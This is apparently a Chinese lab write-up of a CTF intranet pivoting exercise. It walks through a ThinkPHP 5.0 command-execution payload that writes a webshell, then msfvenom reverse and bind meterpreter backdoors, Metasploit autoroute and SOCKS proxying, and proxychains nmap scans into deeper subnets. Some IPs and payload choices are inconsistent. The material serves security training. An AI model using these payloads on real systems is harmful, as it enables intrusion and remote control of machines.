内网安全——域横向内网漫游

复现环境: 

CFS三层内网漫游安全测试演练——某CTF线下2019

内网安全——域横向内网漫游_第1张图片

kail (192.168.174.130)

虚拟机web服务器:kail (192.168.174.151、192.168.2.100)、windows2008(192.168.2.2、192.168.3.2)

1、访问虚拟服务器靶机192.168.174.151发现为ThinkPHP5.0版本,这里可以利用ThinkPHP命令执行漏洞上传webshell后门。

内网安全——域横向内网漫游_第2张图片

2、 利用Payload写入shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^ >shell.php

在靶机查看发现成功上传webshell

内网安全——域横向内网漫游_第3张图片

3、kail上利用蚁剑连接webshell

内网安全——域横向内网漫游_第4张图片

 4、kail生成后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t2.elf

内网安全——域横向内网漫游_第5张图片

5、kail上进入msfconsile,接收反弹

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 192.168.76.132

set LPORT 1111

exploit

内网安全——域横向内网漫游_第6张图片

6、在蚁剑工具上上传刚刚生成的木马文件 

内网安全——域横向内网漫游_第7张图片

 7、在蚁剑的虚拟终端处使用命令执行木马文件

chmod +x t2.elf                #给予文件执行权限 

./t2.elf                               #执行木马文件

内网安全——域横向内网漫游_第8张图片

8、kail成功接收到反弹对话框

内网安全——域横向内网漫游_第9张图片

 9、在反弹对话框进行信息收集及配置访问

获取网络接口:run get_local_subnets

查看路由地址:run autoroute -p

添加路由地址:run autoroute -s 192.168.2.0/24

内网安全——域横向内网漫游_第10张图片

10、开启msf本地代理

use auxiliary/server/socks_proxy

set srvport 2222

exploit 

内网安全——域横向内网漫游_第11张图片

11、配置 proxychains 后调用工具探针 windows2008网站地址

vi /etc/proxychains.conf

在最下面添加socks4 192.168.76.132 2222

proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80

-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。

-sT:扫描 TCP 数据包已建立的连接 connect

12、利用本地代理接口访问测试

设置浏览器代理进行访问测试,成功访问网站

内网安全——域横向内网漫游_第12张图片

内网安全——域横向内网漫游_第13张图片

12、同理,利用windows2008网站漏洞上传webshell后门文件(因为条件有限没有搭建有漏洞的网站,有兴趣的可以自行搭建上传木马步骤和上面一样,这里直接创建木马文件在网站目录下)

内网安全——域横向内网漫游_第14张图片

13、在kail上利用蚁剑工具自带的代理设置设置代理连接192.168.2.2主机,测试成功连接

内网安全——域横向内网漫游_第15张图片

 内网安全——域横向内网漫游_第16张图片

 14、在kail上生成正向后门,通过蚁剑上传给win2008,因为win2008和攻击机不在同一个网段无法反向连接到我们,所有生成一个正向后门绑定端口为3333进行连接

msfvenom -p windows/meterpreter/bind_tcp LPORT=3333 -f exe -o 123.exe

内网安全——域横向内网漫游_第17张图片

内网安全——域横向内网漫游_第18张图片

15、配置msf访问接受

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set rhost 192.168.2.2

set LPORT 3333

exploit

内网安全——域横向内网漫游_第19张图片16、 蚁剑虚拟终端运行后门文件,成功接收到会话 

17、继续进行信息收集及配置访问

获取网络接口:run get_local_subnets

查看路由地址:run autoroute -p

添加路由地址:run autoroute -s 192.168.3.0/24

内网安全——域横向内网漫游_第20张图片

 18、测试成功打开192.168.3.2所在的网站(可以再搭建多个虚拟机服务器靶机,进行攻击,同理一样利用网站漏洞或者系统漏洞上传木马实现控制,重点是使用代理技术实现内网攻击)内网安全——域横向内网漫游_第21张图片

你可能感兴趣的:(安全)